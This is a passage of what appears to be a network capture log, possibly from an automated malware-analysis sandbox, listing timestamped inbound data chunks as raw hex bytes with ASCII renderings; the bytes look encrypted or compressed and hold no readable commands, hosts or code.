2023-09-07 07:31:08 UTC	67	IN	Data Raw: 6d 3c b4 09 99 fd 46 10 9d 2f 4e e4 32 26 ce ea 5a f6 d5 e5 44 c4 6e 6f bd ae b8 cc 6b 5c cc 6f 27 88 47 4c ee ed 75 67 f8 32 60 df 6b 4d 1a 69 ec 1d f7 12 c4 b9 d7 92 f9 9c fd 12 b6 03 b9 73 90 ee 45 e1 f7 40 33 70 44 59 44 ef fe 9f f0 da d9 c1 8b a4 03 bd 2c 76 08 b0 2a 8e fb 1c 5c 68 8e 0d 45 2c eb 2c 71 f5 a2 8c 75 f7 8b 0d 98 ef c0 1a 26 5d 63 8f e8 b8 ac 61 e9 d5 57 92 4b 60 9a 7d e7 b3 dd ae 97 5b 9b 47 37 da 4d 00 a4 04 3c 97 49 7f 2b 8d 12 03 f4 e8 f7 09 64 c7 25 bd 85 0a 29 3e 8f e5 1c 2d 2b 5d 33 fd 89 51 e6 ee 1a de 92 f2 58 8c 84 c5 0e 39 f6 e7 80 4b 9a 74 08 e9 82 d6 88 e5 49 a8 cd f9 6b 60 60 0c c9 0e 54 79 d7 d8 86 af be 04 c9 7b c3 98 3f dc ae 79 bf 6e be ee 48 d5 c7 0e 58 89 c0 03 4c ad c4 42 3e 80 48 15 05 bd 8c dd ec f2 92 5c ff 11 73 Data Ascii: m<F/N2&ZDnok\o'GLug2`kMisE@3pDYD,v*\hE,,qu&]caWK`}[G7M<I+d%)>-+]3QX9KtIk``Ty{?ynHXLB>H\s
2023-09-07 07:31:08 UTC	68	IN	Data Raw: cc 42 0e c9 4e 88 e8 2c 65 43 21 93 b8 4a 50 92 2c cf ce 77 b2 2a 8f 53 78 7d b9 45 73 68 af 29 df 7f 3e 03 f1 44 a1 4d fb 9d f6 d1 d4 60 db 6d 26 e3 51 26 fc 69 ed 0d 7b c3 21 44 0d 1a 6a 80 da b7 1c e7 0c ea 1a aa 60 45 70 85 28 6c 01 fd 58 35 c0 34 da b5 30 c3 51 88 34 b3 ab 7a 71 89 2a fd d9 ff 10 e1 d9 6a d8 e8 e4 53 33 49 6d 28 ca 4f 7d a0 82 c1 1e 91 57 df 00 7a 52 05 56 a9 d2 ab 6b a0 5c 00 f2 06 6f 5d ba df ed 29 21 04 23 b2 73 69 fb ad ec 6d 57 66 24 c4 a6 b9 ab 31 2f 80 51 c5 0a eb 38 a3 47 a8 f2 51 b4 85 48 73 dc 18 ff 53 15 a6 c4 18 3b 32 11 59 22 43 e3 af eb 11 ce 15 43 2a dc e1 40 04 b3 9e 70 43 65 3c 08 a5 ed 28 cb 09 c8 4e fc 1f de a7 82 d8 31 3f 8a 1c 62 33 3c b1 da 9e b6 7c d2 8c 4a 52 ef 74 01 e9 42 a3 95 b0 e2 c0 d4 a6 c6 a2 07 2d b9 Data Ascii: BN,eC!JP,wSx}Esh)>DM`m&Q&i{!Dj`Ep(lX540Q4zqjS3Im(O}WzRVk\o])!#simWf$1/Q8GQHsS;2Y"CC*@pCe<(N1?b3<\|JRtB-
2023-09-07 07:31:08 UTC	69	IN	Data Raw: c7 e2 fd d4 15 55 f2 dc 91 6a 08 15 3f 58 fb c6 ed 3e c7 0e aa 2e df 62 39 ed 7f 94 49 df bc 47 87 d5 bc 15 3d 6b 97 ab b7 2f 35 19 3b 37 fc 8b e4 fc 8f 09 29 fa ef 44 db 6a 22 19 2e 16 44 1c 92 29 ac 35 88 38 16 14 fb 63 7e 03 f9 fc 54 21 54 72 1c 6f 25 e4 98 63 81 fd 1f 92 10 5f ef 07 04 fd fc 9e 51 61 09 c6 41 a0 8b 79 1f 29 9c 8e e4 32 b0 ad 7b 59 73 0b 89 4e d0 e1 94 a5 0d 9c 70 dc d0 dc dd e3 ac 9c 44 dc 5f 62 a8 4c 19 6c 73 0d bd 43 6e ef 3a 73 10 26 9b 87 72 07 de c2 f3 c6 36 78 e6 97 7e 84 75 5b a7 2c b2 a1 6a b3 5d fd fa c1 98 bd 41 34 01 4c ca 7a da c7 81 53 56 9b 6d 0a 6f 84 0b 12 cd 3d b1 d6 8e 8f 53 eb ef bd fd 19 f7 9a ed 95 ec 1d 52 ef 54 bb d7 5c 94 5f 8f 99 ab 6a 13 8c 26 42 e2 5e 06 87 5e f4 34 bd d1 11 6a b2 c0 6e 43 0a 57 cf fb a0 c4 Data Ascii: Uj?X>.b9IG=k/5;7)Dj".D)58c~T!Tro%c_QaAy)2{YsNpD_bLlsCn:s&r6x~u[,j]A4LzSVmo=SRT\_j&B^^4jnCW
2023-09-07 07:31:08 UTC	70	IN	Data Raw: 41 7e 0f aa 1d b5 f3 ee de 36 e8 3c 74 b4 dc 34 e7 64 2b 65 21 34 5f a8 f9 6a 39 56 93 f3 0f e0 fd 09 62 8e 31 37 31 5b 3d 51 1e 52 3b bb a6 4a 1e 09 2a df a6 df 8a 30 96 b2 44 c6 2d 14 42 7f 9a 64 13 e4 14 e7 c9 28 30 6e bf 2b 90 2e 46 10 25 04 51 f1 e9 20 3c b1 1f 10 de 0a a8 5a 3d b0 91 0f 99 a2 9e 19 1c ed e6 c7 cd 6f eb 28 0f f3 8d 4f 9a 88 8f 1a 61 27 24 e6 2a 40 f4 fe 7c 52 83 67 0b eb 19 26 78 0d 36 3d 4e 2c 64 ca 81 da b6 f3 53 3d c6 c1 80 32 41 fa d5 52 1b 3b 19 be da a5 2b ec f3 1a 16 17 f7 5d bd ad 24 e6 d3 ce cf bf 37 14 a8 19 e6 4a c2 3c 54 90 cd c7 3a 4d 50 0b 4d 23 51 3c a7 6d 24 5f e5 f5 3d a0 40 6c 69 96 19 84 c3 83 68 f1 10 d5 f0 e5 3b 81 16 8e 39 5a 28 53 6c a8 b8 a0 68 22 a4 74 13 f8 48 53 26 2a 65 b6 82 7e 47 c6 4c a0 dd 34 8e d1 e1 Data Ascii: A~6<t4d+e!4_j9Vb171[=QR;J0D-Bd(0n+.F%Q <Z=o(Oa'$@\|Rg&x6=N,dS=2AR;+]$7J<T:MPM#Q<m$_=@lih;9Z(Slh"tHS&*e~GL4
2023-09-07 07:31:08 UTC	72	IN	Data Raw: 66 c7 da 43 a9 ff 75 e6 53 c5 6a 1d c6 8e f3 5f 9d f5 21 ed d8 ee cd fd 3a fb aa 0f db 67 13 47 e4 33 aa 1b fa c9 85 10 4f 46 f0 85 10 9a 8c 82 1d 0d d9 b8 85 f1 8e ea 47 74 b2 41 29 e5 fa 76 50 84 4b 1f b7 85 11 fc 24 9b 1a 40 ee 4b 09 59 20 09 7f 45 4f 4a 73 5d d7 7f 0e 9b 49 2f 08 28 78 e0 bb 3e 98 7b 79 c0 93 7f 8d b3 7b 80 08 88 a0 a1 68 a5 e7 cf b7 f9 f4 c4 8e 2d 17 05 6d 90 fb 8e eb 0b 7f 70 02 da 89 a2 8e 2e f0 b0 3b 3b c5 45 f6 cb 04 0e 43 e2 9d 94 d2 4f 6d 98 49 99 1b c8 54 e8 04 bc 13 cd 9a 8f f8 a6 b3 c8 4d 45 dd 80 73 b9 c7 59 d9 a1 bf d2 8f d0 2a fa 94 c7 4a f3 b1 d9 17 60 02 77 e7 ec 3f 82 81 f7 5d 1b 4a 6b 74 34 3c 6c 6a eb 88 b2 ca 68 1f 40 da d7 06 8f 2e c6 b8 02 bc d5 9b a4 89 d4 bf 92 44 c9 50 ab 97 c8 b3 72 4d eb ae c7 ce f7 f8 ef f1 Data Ascii: fCuSj_!:gG3OFGtA)vPK$@KY EOJs]I/(x>{y{h-mp.;;ECOmITMEsY*J`w?]Jkt4<ljh@.DPrM
2023-09-07 07:31:08 UTC	73	IN	Data Raw: 2f da 62 b6 7c d2 ae c2 58 ef 79 06 1f 54 19 e5 3f f4 cb de 89 4e 5d 06 0b aa 02 13 61 b0 0d cf dd b7 af 45 32 7c 5c 34 9e af 7d 34 3b 6d aa 40 4a b5 78 63 54 90 8c e0 8a b2 0b 88 45 fa cf 49 17 fa 67 2a ef 9d 96 70 c6 53 6b 40 3b 82 ad ad 7a d2 b4 53 8d 29 9c 6a 82 66 fa 07 51 51 54 19 e9 1b 20 e7 91 00 a1 36 6b 63 8b 50 64 e7 ea 77 4b 43 c6 73 5c f7 29 65 12 46 4f e7 33 22 ce fd 4b f1 33 1a 69 d7 17 c5 ae a7 a3 f5 be 80 26 24 01 f5 4b b2 e9 bf c5 76 fc 35 18 18 bd b8 4f 52 80 1f e6 1a f3 83 29 93 df f8 f6 bb 99 59 91 15 95 e7 1b 46 80 40 33 78 1f 9f 45 ef fe f2 fa 1b d9 cb 90 ac 0d ce a1 68 04 44 3a a5 b7 ed e1 68 84 21 f5 d8 3c cc 03 4c c1 8e 7f e0 fd a1 0e 86 ab a7 21 8a 83 a8 0a da ae 65 f0 da 58 9c 4b 7b b4 7d 78 a7 86 aa cd 5b 99 50 12 e1 65 9a af Data Ascii: /b\|XyT?N]aE2\|\4}4;m@JxcTEIg*pSk@;zS)jfQQT 6kcPdwKCs\)eFO3"K3i&$Kv5OR)YF@3xEhD:h!<L!eXK{}x[Pe
2023-09-07 07:31:08 UTC	74	IN	Data Raw: 0b 65 9d 28 57 0a b1 0d bc 3a e5 3c af ca 0d 03 e8 81 e6 6a 90 50 a0 78 d2 4f ab 94 95 42 54 74 ae f4 db 45 de f0 ce 28 9b 88 07 06 85 4b ae 32 bb a7 fc ec aa 80 22 d1 d7 4b 50 19 47 ac a4 61 2d f7 4e 5e df 04 c8 25 09 bb 4d 15 a2 30 39 ae 1b 5c e9 d6 c1 62 1d 3d 0c 7c 32 bd 67 65 82 32 1b d0 fe 81 92 7a c1 06 fb a0 e1 5b 7b 9f a0 fd a3 c5 9e 57 7d a8 fb 35 6f 52 29 93 89 4a 50 92 31 e6 b0 8e 10 d6 74 df d9 aa a6 53 42 2d 23 28 d5 f5 ac 8e f0 40 8b f9 3f 81 53 06 a9 5f c8 65 0e ef 5f 3a 08 e8 7a 17 79 bb 97 36 0c 1e 62 7b a3 b7 1c e7 f1 f1 1d f2 7d 9d e5 95 28 68 00 f3 7b 39 c0 10 d4 aa 13 4f 50 a4 2f b4 a9 46 0b 9a 24 f5 03 ed 32 e9 bb 17 c6 c6 10 58 07 10 6f 54 19 b1 7c 88 86 c8 51 15 01 d8 18 86 7b 9f 54 82 da 82 cc 66 5f 8c d0 17 6b 35 5e aa ec 23 3a Data Ascii: e(W:<jPxOBTtE(K2"KPGa-N^%M09\b=\|2ge2z[{W}5oR)JP1tSB-#(@?S_e_:zy6b{}(h{9OP/F$2XoT\|Q{Tf_k5^#:
2023-09-07 07:31:08 UTC	75	IN	Data Raw: ba f6 bf 76 20 a9 65 06 ce 00 52 d8 f9 79 b3 ee 88 11 c0 5e a4 29 a2 8e d1 e7 f8 27 fd 3a 7f 0e 8d 59 10 28 60 a2 35 ef 9d 58 28 1c 74 a4 30 57 40 b5 1c 1c d2 1b b3 33 ca fa ab 9d 3d 21 a5 29 07 d3 34 96 94 f1 d9 5e 8c b1 a5 2a c8 4b 14 a8 e8 56 a8 01 41 7b 82 1d c6 41 31 9d 75 40 c5 e9 28 72 39 a5 db 1d 37 bb 0f d0 91 5a 04 26 1b 0e c0 df c4 f6 de f8 09 97 d7 50 63 0f 11 ad d0 c7 eb 47 75 fa ab 24 c8 13 95 35 d1 74 3b 65 df 45 8d d1 ef 46 3c 6b 95 c9 3e 0e c3 bd f9 fa d5 e9 ec d4 1c 67 03 f1 c7 ea f6 71 26 1a 19 cf 56 0e 94 18 b8 84 45 9c 3f 5a f3 72 72 3c a7 ef 5e 34 54 f0 0f 6f 32 f4 81 39 fc fd 33 91 37 75 f3 11 2c 74 cb 8d 45 49 9c d5 5e ef 55 4c 9d c4 d0 b5 96 2f f6 b8 49 95 33 0c 33 76 4c e2 b8 ac 60 fb 75 b5 f2 54 df e2 aa 85 51 c4 59 62 b2 74 6f Data Ascii: v eRy^)':Y(`5X(t0W@3=!)4^*KVA{A1u@(r97Z&PcGu$5t;eEF<k>gq&VE?Zrr<^4To2937u,tEI^UL/I33vL`uTQYbto
2023-09-07 07:31:08 UTC	77	IN	Data Raw: 1e ed ba 81 c8 4b e7 4b 93 5b 8b 5c 9c 84 cb bd 7c 6f 0a a2 15 d0 d9 b3 2c f2 1a 63 a6 51 a5 e6 56 55 62 7a c4 23 8e e5 cb dc eb a0 c9 20 4b 8a 32 b5 9d ce 47 e4 6e a7 60 a7 0d ad 52 84 65 0f 0e 78 b1 3b 52 83 44 9e bb cf 3c 71 d5 01 6d 26 0b 1b de 2e 09 ca 67 87 2f 20 e6 62 4a fa ef 7d 79 25 04 4d 9a 35 54 19 f2 11 51 77 7a d5 13 f3 52 61 4e 3b 3b 98 be e6 fa eb 91 b0 59 b2 d1 45 80 e8 2a 6f f7 1a e5 a8 e9 60 11 c5 92 c4 05 d3 b5 93 69 8e 37 44 ba 49 0d 5f 09 7f b7 ba a6 38 36 9b 3a c9 a1 f6 c2 f2 9f a5 be b4 8d 18 46 6b 4c f1 16 f2 e0 ce 3c 05 13 7c 9a 8f 98 36 be 37 16 4d 54 89 c3 28 23 ae 03 f8 21 27 8b 5b 2c a2 f5 27 30 ba 60 1e 23 e9 d2 d3 f5 b6 fd 53 17 e8 aa e8 90 b2 9c 33 0e e0 3a 84 2c 48 bf ff 7c 5c 97 1c df 7b 77 4c 5a 88 20 65 48 1e 48 ff 69 Data Ascii: KK[\\|o,cQVUbz# K2Gn`Rex;RD<qm&.g/ bJ}y%M5TQwzRaN;;YE*o`i7DI_86:FkL<\|67MT(#!'[,'0`#S3:,H\|\{wLZ eHHi
2023-09-07 07:31:08 UTC	78	IN	Data Raw: d5 c2 d8 d5 a2 ef fd 4f 83 4f 7b b0 ed 65 59 87 84 8e 91 9b 41 1b 92 dc 6e d3 b0 4c 96 4d 6a 62 ef 01 03 ef e5 e5 41 9a c0 16 b2 79 70 c5 01 f1 5d 1f 44 be 66 b6 ce 63 0b ce 93 5b cd 86 8c f3 9e 9b f2 d0 e8 09 12 d8 18 39 76 08 eb d9 41 89 e5 49 90 4e a6 80 3a 42 46 46 0f 52 5b cc d7 7c 5a 32 6b fc 68 db f7 5f cf b1 30 5e 72 98 d6 4c c9 a2 7b 58 a5 f5 64 83 21 c5 46 14 ee 09 fe 5f 9f c6 4e ed f4 e6 fe d7 8b 76 ad 1e f0 e7 15 41 df f6 da 89 a3 e3 8f 2b ed 45 f0 ad 38 09 8d 83 17 1e c6 b1 cb c9 8f ea 50 70 53 53 fb e7 d6 2f 58 ff 8b 08 49 80 3a f7 57 16 66 ab ed 5e 61 17 32 10 0a 45 65 40 62 48 94 f5 0f cc 4f 3e 0d 27 f3 e1 aa 22 a3 e7 40 89 95 57 1d b2 6a 84 00 ef d2 a1 44 a0 cd 4e b2 90 d6 4c 1e 2c 11 1c 79 88 c6 06 e4 0b 68 03 d2 ff 77 a7 bd 25 e1 d9 fa Data Ascii: OO{eYAnLMjbAyp]Dfc[9vAIN:BFFR[\|Z2kh_0^rL{Xd!F_NvA+E8PpSS/XI:Wf^a2Ee@bHO>'"@WjDNL,yhw%
2023-09-07 07:31:08 UTC	79	IN	Data Raw: d7 00 b2 7c d9 18 8e 55 46 e4 83 d0 86 d8 38 5e 8c de 15 6a 40 ba 1b ed 29 2d 3f 26 3c 1a 6d 92 c0 0f 5d 57 6c 2c d9 15 b8 ba 21 23 bc 2b c3 62 4c c7 a2 6d b1 84 ac dc 92 1b 16 27 13 ff 5e 6c f6 c4 34 3e 6a 0d 6a 19 45 fb 51 ec 52 7c 3f 41 07 73 53 42 6b bb 8d 79 79 46 35 57 0b ec 19 cd 18 c1 3f fb 08 97 20 e6 5c 12 3f 8b 1a 95 5d 8d b8 a9 e7 b4 7b cf de c3 d4 f0 73 17 16 4f 88 8e e8 f6 cc c3 f9 4f 04 05 8f d2 3a 0c f4 c4 95 96 4c 96 80 d6 bd 15 51 3d ce ef e6 44 b3 74 f2 42 74 2c 51 48 5f b8 17 e7 e5 08 1b 80 59 03 38 27 8a f0 74 26 94 3c 26 71 c2 4a 42 55 bb eb ab fa 0a 2c 4a 52 ab 35 f1 c8 8b 77 f5 96 6e a8 53 76 5f 23 46 e2 80 06 30 41 6f 34 e4 a2 6a fc 1e 19 c9 4e c4 0e c1 fc 11 fa 9c 2f 44 fd 4f 9c cf ec 43 9d 9f e5 68 fd 03 d9 ac a4 a0 83 00 8f 26 Data Ascii: \|UF8^j@)-?&<m]Wl,!#+bLm'^l4>jjEQR\|?AsSBkyyF5W? \?]{sOO:LQ=DtBt,QH_Y8't&<&qJBU,JR5wnSv_#F0Ao4jN/DOCh&
2023-09-07 07:31:08 UTC	80	IN	Data Raw: b5 24 3e 30 c9 58 b9 bc c1 60 ea 76 db b5 e1 de e2 a6 be 51 db 48 7b cf d4 7f 6d 79 2b b3 60 7f c9 a8 63 1e 3f ef fc 72 2b dd a3 77 61 44 8e f9 8b 6c 99 7c 5c ba 39 8e 1c 7a 96 46 e6 f2 d0 af 2d 4a 2b 13 4e c2 6b c3 93 86 19 b9 90 59 5c 35 b4 ae 3b 5b 3a a2 d9 b9 18 41 e5 e5 8c c8 af e3 c1 e9 fe 9d 13 54 cf 9b e1 db ea b2 3d 9c 97 bb fb 64 a0 22 48 57 5c 02 90 17 e9 21 8a 25 01 41 b2 c3 f9 7a 9d ad 5f 81 8a d3 b8 99 b7 f6 26 f8 a5 e7 d4 6b 5d f4 a1 37 99 f3 cf 69 97 4f dd b4 9c b5 fb ec 99 80 22 d1 d2 3e 8f 17 5f 89 f8 76 05 f1 51 0e a3 1e c8 34 0d 78 60 c3 0f 1d 30 90 72 07 e9 d6 dc 4d 3e bf 57 6d 3c a0 2a 3e 82 1e 06 ed e7 96 bb 4a 15 2f a1 88 87 48 73 88 c6 cb cb 54 fa ee 64 e4 fd 3b 6f 49 0d 8d a5 b4 51 bc 2e 95 c8 6b 85 d5 7e ac 52 ab a6 42 6b 5a af Data Ascii: $>0X`vQH{my+`c?r+waDl\|\9zF-J+NkY\5;[:AT=d"HW\!%Az_&k]7iO">_vQ4x`0rM>Wm<*>J/HsTd;oIQ.k~RBkZ
2023-09-07 07:31:08 UTC	81	IN	Data Raw: 31 75 25 24 97 2c 3b 25 fa 64 a8 81 43 56 6c 7c 5f 61 01 21 74 46 38 9d fa 45 cb 9e 88 8d 2e f6 c3 82 3b 9f fa d5 2f 1d 2d 0b 80 e9 ac 13 47 ee 09 12 17 f7 51 b8 ad 24 e6 c4 da de 75 2a 07 a4 1b 8c 9d da c2 51 e5 cb c3 a4 56 50 1a 48 3e b6 2e 83 63 36 40 a7 1c 64 01 50 6b 7f 69 12 9b cf 8e 96 e2 74 e3 16 f8 04 8e 1e 89 00 Data Ascii: 1u%$,;%dCVl\|_a!tF8E.;/-GQ$u*QVPH>.c6@dPkit
2023-09-07 07:31:08 UTC	82	IN	Data Raw: 6d cd 41 44 ad bf a8 6d cf ad 58 04 f6 7f b2 2e 15 7f b1 84 49 07 3e 5b 8e a2 f4 99 c2 e1 83 fb f9 25 71 e7 e6 2c 10 78 a7 9a 90 15 0c fd 07 bb 4a 4c c8 82 bf b3 36 1c d2 1e b3 bd c0 fa ab e2 3d 21 a5 29 1e ea 2f 00 98 e6 27 5f b1 aa b8 30 b7 6c 38 af e5 5d a8 1e 5d 7e 6e 1c fb 50 2e 85 81 41 ef fb c7 76 16 ff e3 1a 03 70 1f e8 91 58 26 3c 53 98 c0 f3 f9 7d dc fb 09 90 aa 0d 32 47 38 37 d1 c7 fc 31 e3 05 aa 02 ce 62 3c 4f 0e 7e 13 f3 dd 1d fa 0c 94 84 38 75 82 bf b2 1e c6 ab 2f 6c f8 fe e4 87 57 66 03 ff ed 35 28 71 20 38 00 90 46 34 b4 08 aa 91 7f 71 3b 76 e8 66 63 d5 fe d0 53 28 74 cc 12 73 30 e3 9e 1d 07 e3 16 66 0e 5e 66 11 2c 6b ff e5 89 49 8d c3 43 d1 74 4d b1 c7 c0 b0 8e 18 90 aa 5b 9f 20 1c 3a 43 a1 e7 e9 43 62 ea 74 cd de 89 01 e2 ac 92 50 d3 10 Data Ascii: mADmX.I>[%q,xJL6=!)/'_0l8]]~nP.AvpX&<S}2G871b<O~8u/lWf5(q 8F4q;vfcS(ts0f^f,kICtM[ :CCbtP
2023-09-07 07:31:08 UTC	83	IN	Data Raw: e1 2f c6 b6 7b ca 49 93 ec 42 ce b7 89 a5 8a 6f a3 81 ca bb 71 6e 1d af fa d9 e9 7d 2f dd 77 ef a9 55 a1 fc ab b0 71 7e df 0e 0f e1 45 bf f6 ae 81 55 d1 a3 de be b5 58 55 e3 79 9c f9 a6 1c af 57 52 fe 22 04 6f a5 07 98 8d 57 8c a5 cd 26 6e fe f7 75 f4 03 0f 64 3d 0d ce 7d b2 39 41 16 72 58 e3 2e e6 78 09 0d 5e 81 03 d4 09 fa 0f b0 37 45 d3 33 2c 10 6b a0 ed 58 b6 f3 e2 8b 46 e3 3b 52 c8 c4 52 e0 6c 2b 7e f5 25 8b a8 c5 73 3b 2a 67 c4 0f cd e3 fc 68 8e 35 49 c1 48 0d 51 36 cf 3a bb a0 38 06 1a 33 c9 ba fc a6 3a 61 a4 96 e6 06 17 42 6f 60 e8 7e e0 ee f7 ac 15 16 f8 db 22 90 b8 d1 03 0f 17 6f 77 c2 39 37 a2 11 19 2b 18 8c 59 2c af 83 02 6e ba 4c 13 21 e8 f4 c5 19 5b 02 5d 0b e4 92 16 80 96 9c 3f 8b 20 16 90 08 f5 64 eb d9 7e e2 6d 53 7c 04 e8 73 05 2b 1f 5d Data Ascii: /{IBoqn}/wUq~EUXUyWR"oW&nud=}9ArX.x^7E3,kXF;RRl+~%s;*gh5IHQ6:83:aBo`~"ow97+Y,nL![]? d~mS\|s+]
2023-09-07 07:31:08 UTC	84	IN	Data Raw: 34 df 8b a5 d3 eb f6 b1 6e fc f4 4b 83 42 73 44 63 1c 5f 91 95 f3 43 88 48 1f ea 44 1d 50 76 60 9f 4f 72 ca 95 4b 09 e0 e4 f3 03 75 c8 25 b5 85 0a 29 0e e0 51 0d 2a a1 14 c9 98 63 0b ce 93 0d cd 9d 8c f3 85 9b d3 d0 e8 09 06 d3 72 fc f8 61 b7 a7 d5 9b f6 4a 88 2c 23 9e 33 b6 6f e7 02 43 57 e7 dd 08 cc ff 3c d7 71 da fe 4e cc a7 6f 5e 72 98 e8 49 e6 f6 ed 4a ac ff 6c f9 b2 cf b8 1f ea 9f e9 52 8a e2 cc e5 f4 fd ef e8 ef 76 81 1d 95 66 0c 52 dc e1 b8 0c bc 1d 84 2f 75 55 f6 b0 48 89 8a 9c 14 1e c1 ae 9e d3 86 14 40 4e 45 51 00 f7 fc fb 51 98 5e 01 49 95 34 e1 05 67 30 87 e2 5a 74 5f 20 3b 0c 5b 65 4a 72 42 f8 72 1d c5 45 3e 01 4b 69 1e ab 04 99 64 45 9f 97 76 9c b7 e4 e7 3f bc 5f a0 4e b5 f7 cd ba 90 cd 6d 90 22 ef 17 44 84 ff 9a f4 03 f4 6d 19 e0 67 b0 ab Data Ascii: 4nKBsDc_CHDPv`OrKu%)Q*craJ,#3oCW<qNo^rIJlRvfR/uUH@NEQQ^I4g0Zt_ ;[eJrBrE>KidEv?_Nm"Dmg
2023-09-07 07:31:08 UTC	85	IN	Data Raw: 88 d3 66 db e9 6b 98 57 de 38 43 03 3c f1 aa b2 82 b7 a0 30 fa d4 06 65 55 d8 ba e1 23 58 5a 22 b2 75 69 c4 be e3 4c 5e 09 5d b7 a6 bf ab 28 22 c4 08 c4 0d fa d7 ad 7a a4 ee 5f b4 85 44 68 cb 33 bf fb e9 02 ed 56 3a 32 00 3d 55 45 fb 57 fb 32 df 30 50 0f 2a e7 58 5b b8 9e 4c 6b 4f 2f a9 a6 ed 08 dd 1a dd 04 d0 1c cf b1 89 e2 06 20 87 f5 9d 1e 19 81 08 ed b7 7c c7 8d 41 4c ef 62 02 0d bd 8e ba b8 cd 5b d4 a1 de 47 15 14 bb 1b 1e ec 3d 83 e2 c5 b9 a7 a1 9c 96 0c 0d f4 b4 eb 41 db 46 ab 4a 68 1f b8 61 5e b8 01 f2 9f b8 0b 95 43 92 a7 0a 92 fe 47 a6 3a b9 cc 58 a0 4e 53 55 5a a8 bd a3 6f f5 eb 50 a1 3d 83 68 9f 77 e2 84 64 0e 54 35 f7 26 66 6e 39 ea e4 00 1a 6f 8b 47 05 d6 15 76 6d 75 45 0a 99 f7 37 72 89 2f 55 ee 3f 27 30 ed 69 e5 3d 69 77 fb 10 d2 97 b1 b0 Data Ascii: fkW8C<0eU#XZ"uiL^]("z_Dh3V:2=UEW20P*X[LkO/ \|ALb[G=AFJha^CG:XNSUZoP=hwdT5&fn9oGvmuE7r/U?'0i=iw
2023-09-07 07:31:08 UTC	86	IN	Data Raw: 35 b7 81 40 86 2f 1e 3d 6b a4 1d 95 8f 66 ea 67 cf d7 f4 cf ef b0 68 56 f7 4a 5a a5 4c b4 93 8c f2 bd 48 46 c7 a8 72 11 30 f4 02 71 07 13 9b cd 71 bb 7d e6 97 7f 97 67 7d b0 26 dd e3 7b ba df f7 f8 d6 e1 2d 47 0c 3f 5c cc 6b d2 8c 9e 14 4d 6f 74 7c 3c 8a 91 25 5b 3c b0 fa b9 00 41 ec e5 8c c1 ac e3 c1 e9 fd e8 1a 3b 34 91 ea c8 e5 af 3a 8d 88 aa 1f 9b 8d 0a 42 46 4c 63 69 06 e7 34 b7 c8 07 6d a1 ef eb bc 0b 7d ae 7a 81 c7 cc 94 9f 15 57 f8 af f4 c9 7e 4b f1 df 25 87 0d c4 2a a2 49 b2 42 ba a7 fc c6 2b 83 ac b2 90 04 51 19 47 88 0e 73 2b 2c 9b 15 cc 0a ee ea 07 b2 ef f4 a3 1c 31 bc e1 55 fa d1 de 43 09 2f f2 6c 10 a8 43 8c ec c6 0c c1 fc 8d 88 7f ba d4 fc b9 1b 4b 5f 84 b7 e6 d5 54 f0 c9 69 91 fb 3c 6f 52 20 94 4b b5 7d b7 5d f8 ca 4f 1a dc 69 bf 55 ab b7 Data Ascii: 5@/=kfghVJZLHFr0qq}g}&{-G?\kMot\|<%[<A;4:BFLci4m}zW~K%*IB+QGs+,1UC/lCK_Ti<oR K}]OiU
2023-09-07 07:31:08 UTC	88	IN	Data Raw: 36 44 36 69 6b 5d 43 38 84 2e 13 8a ff 7c 50 93 66 8d 2b 66 4c 5e 02 30 6f 2d 30 63 fb 63 00 8d f5 73 27 76 c7 80 73 74 89 69 2a 1b 31 1b a3 d8 a6 10 5c f7 0b 13 64 5d 54 a1 55 3a ea f5 3f 0d 7f 70 2f c2 1b f7 44 f2 7c 54 bc c1 ca be 8c 44 1a 47 05 4f 3e a4 02 21 57 fe 01 e0 8a 5c 43 a2 7c 1b 83 dc 9b 91 d3 60 9f e8 f9 68 6b 17 9f 31 51 d0 72 4e 2d ae ac 33 e7 ad 74 02 83 ee ac 27 0c 14 18 94 4d 1b de 01 b1 aa 87 58 d1 e5 89 f9 f0 25 6b 94 f8 00 12 52 b1 ac 24 e2 ec 22 11 b6 63 bb 26 55 6b b4 1c 05 fd 3c 3e 89 c0 fa aa f0 32 30 bd 29 05 ce 1a 1f be d9 f2 5f 9d a9 ab 3e 27 45 57 56 fe 45 a8 0f 56 79 9e 72 2c 53 2e 98 9a 4c fe 8c e1 77 3a f7 d9 15 31 c4 cb c2 91 41 07 34 3c 0c c1 f3 f3 e5 d4 ed 09 8e 37 61 65 cf 39 37 db d4 fd 25 ee 75 c2 3d ce 71 08 2b c1 Data Ascii: 6D6ik]C8.\|Pf+fL^0o-0ccs'vsti*1\d]TU:?p/D\|TDGO>!W\C\|`hk1QrN-3t'MX%kR$"c&Uk<>20)_>'EWVEVyr,S.Lw:1A4<7ae97%u=q+
2023-09-07 07:31:08 UTC	89	IN	Data Raw: ab 57 a3 e5 cf ba 8e 22 65 a3 23 00 12 7e a7 d5 9c e5 01 7d 7b 02 f6 64 aa a2 20 fb d4 f3 c5 c4 6d 96 51 00 14 10 e2 b7 0f 8b c2 78 b0 c4 99 08 c4 71 0a 12 b5 13 c3 b5 81 08 a7 8e c9 54 a4 e4 bd 65 ad db 66 aa 2d e9 d8 91 c1 5e 3f 85 ce 54 12 b9 e6 16 67 0c 5d f0 c4 de 93 85 d4 55 0c 18 7d 78 02 2f 73 63 e6 78 ac a7 9a 01 7c 44 ca 7d 4f 2f d5 b8 1c c6 4d 80 f5 4b c8 41 93 77 84 41 d6 57 d8 bd 67 55 d4 ae eb db ff 9b 3d f8 69 f9 ae 4a 51 f9 09 d2 71 79 c6 23 ad e5 cb dc fe ab 9a 53 d6 82 2d b4 4b 5f 6a f6 4c 7e f1 a6 07 b6 4c c3 da 0e 0e 74 b1 39 52 81 44 85 bb cf 27 77 11 fe 40 01 1d 33 fa 30 09 ca 79 b0 26 21 ef 73 49 ec b9 7d 79 25 0b 44 85 18 dd 18 e3 18 51 3b 97 c6 3f e0 6b 7b 3d 05 c4 4b 0c f5 f0 c2 30 39 70 b6 db 5b f9 66 28 47 27 33 75 af eb 6e 11 Data Ascii: W"e#~}{d mQxqTef-^?Tg]U}x/scx\|D}O/MKAwAWgU=iJQqy#S-K_jL~Lt9RD'w@30y&!sI}y%DQ;?k{=K09p[f(G'3un
